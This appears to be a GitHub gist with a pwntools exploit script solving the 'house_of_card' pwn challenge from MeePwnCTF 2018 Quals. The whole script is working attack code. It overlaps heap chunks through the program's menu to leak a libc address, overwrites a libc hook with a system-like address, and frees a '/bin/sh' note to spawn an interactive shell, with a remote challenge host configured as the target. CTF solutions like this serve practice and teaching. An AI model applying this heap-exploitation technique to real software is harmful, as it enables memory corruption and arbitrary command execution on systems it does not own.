MeePwnCTF 2018 Quals house_of_card
#!/usr/bin/env python | |
from pwn import * | |
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window | |
# context(terminal=['tmux', 'new-window']) # open new window | |
# libc = ELF('./libc.so') | |
elf = ELF('./house_of_card') | |
context(os='linux', arch=elf.arch) | |
RHOST = "178.128.87.12" | |
RPORT = 31336 | |
LHOST = "127.0.0.1" | |
LPORT = 31336 | |
def section_addr(name, elf=elf): | |
return elf.get_section_by_name(name).header['sh_addr'] | |
def dbg(ss): | |
log.info("%s: 0x%x" % (ss, eval(ss))) | |
conn = None | |
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option | |
if opt in 'rl': | |
conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt]) | |
elif opt == 'd': | |
gdbscript = """ | |
continue | |
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint)) | |
conn = gdb.debug(['./house_of_card'], gdbscript=gdbscript) | |
else: | |
conn = process(['./house_of_card']) | |
# conn = process(['./house_of_card'], env={'LD_PRELOAD': './libc.so'}) | |
if opt == 'a': gdb.attach(conn) | |
def add(name, size, desc): | |
conn.sendlineafter('4. Quit', '1') | |
conn.sendafter('Name :', name) | |
conn.sendlineafter('Len?', str(size)) | |
conn.sendafter('Description:', desc) | |
def edit(idx, name, size, desc): | |
conn.sendlineafter('4. Quit', '2') | |
conn.sendlineafter('Back.', str(idx)) | |
conn.sendafter('name?', name) | |
conn.sendlineafter('Len?', str(size)) | |
conn.send(desc) | |
def delete(idx): | |
conn.sendlineafter('4. Quit', '3') | |
conn.sendlineafter('Back.', str(idx)) | |
# exploit | |
log.info('Pwning') | |
# overlap chunks for addless leak | |
add('hogehoge\n', 0x80, 'y'*0x10+'\n') | |
add('fugafuga\n', 0x80, 'y'*0x10+'\n') | |
add('piyopiyo\n', 0x80, 'y'*0x10+'\n') | |
add('bohebohe\n', 0x80, 'y'*0x10+'\n') | |
edit(1, 'hogehoge'*2+'\n', 0x80+0x80, 'ffffff\n') | |
edit(1, '/bin/sh\x00\n', 0x80+0x81, 'f'*0xf4 + p64(0xdeadbeef)*4 + p64(0xd0*2+1)+'\n') | |
delete(2) | |
add('fugafuga\n', 0xd0-8, 'y'*0x10+'\n') | |
conn.sendlineafter('4. Quit', '2') | |
conn.recvuntil('[2] Name : ') | |
libc_base = u64(conn.recv(6)+'\x00\x00') - 0x3c1c18 | |
dbg('libc_base') | |
conn.sendline('5') | |
# overwrite __free_note | |
add('bohebohe\n', 0x80, 'a'*0x10+'\n') | |
edit(5, 'bohebohe\n', 0x81, 'a'*0x8c +p64(libc_base+0x3c3788)+'\n') | |
edit(5, p64(libc_base + 0x456a0) +'\n', 0x80, 'hgoe\n') | |
delete(1) | |
conn.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment